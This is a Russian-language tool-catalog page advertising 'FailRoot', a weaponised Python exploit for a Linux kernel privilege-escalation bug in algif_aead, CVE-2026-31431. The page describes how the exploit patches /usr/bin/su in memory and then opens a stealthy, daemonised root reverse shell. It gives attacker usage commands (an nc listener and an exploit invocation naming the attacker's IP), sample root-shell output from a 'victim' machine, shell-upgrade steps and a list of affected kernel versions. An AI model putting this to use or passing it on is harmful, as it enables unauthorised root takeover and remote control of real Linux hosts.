Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/danimrtzp/cve-2026-31431-revshell
Повышение привилегийФреймворки для эксплойтовАнализ уязвимостейЭксплуатацияПост-эксплуатацияТестирование на ПроникновениеRed TeamingРазработка Полезной Нагрузки
GitHubdanimrtzp/cve-2026-31431-revshell

CVE-2026-31431-REVSHELL

Оружиезированный Python-эксплойт для CVE-2026-31431, объединяющий повышение привилегий в ядре Linux с демонизированным root reverse shell с полным PTY, патчингом /usr/bin/su в памяти.

Репозиторий
3 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться


root@kitploit:~
  █▀▀ ▄▀█ █ █   █▀█ █▀█ █▀█ ▀█▀
  █▀░ █▀█ █ █▄▄ █▀▄ █▄█ █▄█ ░█░

  CVE-2026-31431  •  Linux Kernel LPE  →  Root Reverse Shell

Обзор

FailRoot — это боевой эксплойт для CVE-2026-31431 — записи за пределами буфера в подсистеме crypto: algif_aead ядра Linux.

Он объединяет повышение привилегий с демонизированным root reverse shell с полным PTY:

root@kitploit:~
AF_ALG + splice()  →  4-байтовая запись в page cache  →  патч /usr/bin/su  →  root

Весь эксплойт помещается в один файл. Без компиляции. Без внешних зависимостей. Без следов на диске — бинарник su патчится только в памяти.


Что он делает

  1. Мгновенно демонизируется — двойной fork, отсоединение от терминала, мгновенный возврат приглашения
  2. Загружает модули ядра — algif_aead + authencesn через несколько запасных стратегий
  3. Эксплуатирует CVE-2026-31431 — записывает 4 управляемых байта в page cache /usr/bin/su
  4. Запускает root PTY reverse shell — pty.spawn("/usr/bin/su") → полностью интерактивный root TTY

Reverse shell переживает закрытие терминала (игнорирует SIGHUP), не выводит ничего на целевой машине и подключается с повторами до 3 минут.


Использование

root@kitploit:~
# Атакующий — запустить слушатель:
nc -lvnp 4444

# Цель — запустить эксплойт (ничего не отобразится, он мгновенно демонизируется):
python3 exploit.py <IP_АТАКУЮЩЕГО> 4444
root@kitploit:~
attacker ~ $ nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.1.100] from [192.168.1.50] 50234

root@victim:~# id
uid=0(root) gid=0(root) groups=0(root)

Улучшение TTY (на стороне атакующего, внутри shell)

root@kitploit:~
Ctrl+Z
stty raw -echo; fg
reset
export TERM=xterm-256color
export SHELL=/bin/bash

Затронутые ядра

ОтДо (не включительно)
4.145.10.254
5.115.15.204
5.166.1.170
6.26.6.137
6.76.12.85
6.136.18.22
6.196.19.12
7.0rc1–rc6

Требования

  • Python >= 3.10 (os.splice())
  • Право на чтение /usr/bin/su (доступен для чтения всем на всех дистрибутивах)
  • Модули ядра algif_aead и authencesn доступны
  • sudo не требуется

Автор

danimrtzp


Отказ от ответственности

Только для авторизованных исследований в области безопасности и образовательных целей. Неправомерное использование незаконно.

Скачать инструмент